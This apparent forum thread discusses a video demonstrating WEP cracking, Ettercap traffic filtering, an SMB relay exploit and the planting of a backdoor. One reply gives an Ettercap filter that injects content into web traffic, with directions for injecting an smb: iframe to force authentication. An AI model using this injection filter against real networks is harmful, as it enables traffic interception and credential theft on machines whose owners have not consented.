I liked it. Tought me some things i didnt know so thank you sir
This was just for fun... its not really a tutorial but more of a demonstration... i think i did a good job with this video... the music is epic Lol...
cracked wep...
filter traffic with ettercap and force smb authentication...
smb relay exploit...
upload tools for a secure back door...
enjoy and let me know what you think... im going to talk to Adrian Crenshaw's and see if he would like this video on his site...
direct link
http://vimeo.com/5154318
I liked it. Tought me some things i didnt know so thank you sir
or just run wepbuster![]()
What was the smb.filter? can you post the code?
Very nice video!!
Cool blue backtrack
You should explain how did you know that your windows system was vulnerable to that exploit (there has been, for example, no nmap scan!), else there is no fun in watching only the ending in a film!
If you want something that scans ports and tries to find active sessions to be exploited here's a tool called Fast-Track, it's really usefull for lazy people like me![]()
If you want something that scans ports and tries to find active sessions to be exploited here's a tool called Fast-Track, it's really usefull for lazy people like memaybee it is my own inexperience, but as i tried Fast-Track out, Autopwn option didn't worked successfully on all my victim machines
yeah the smb.filter code would be interesting![]()
www.myownremote.blogspot.com
fast track is awesome, there is a ettercap filter also used with fast-track
i did know port scan because the ettercap filter + smb exploit works when a vulnerable windows computer surfs the web... the traffic is filtered and i guess you can say a script is injected into the traffic witch will trigger a smb authentication trade off or handshake...
the filter below will simply filter all traffic on port 80 and inject new data on the fly in real time...
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "</title>")) {
replace("</title>", "compile this script then run it with ettercap, surf the web on another computer and you will see this text at the top of every webpage");
msg("IFrame insertedn");
}}
for the exploit to work you need to replace an "iframe src"smb:ipaddress"> the authentication process will then happen...
Ps "this is my drunk typing"
Cool vid.![]()
"Things are not what they appear to be: nor are they otherwise." -Surangama Sutra
Nice Vid BTW What is the Theme That you are using it is realy Nice![]()
Nice video!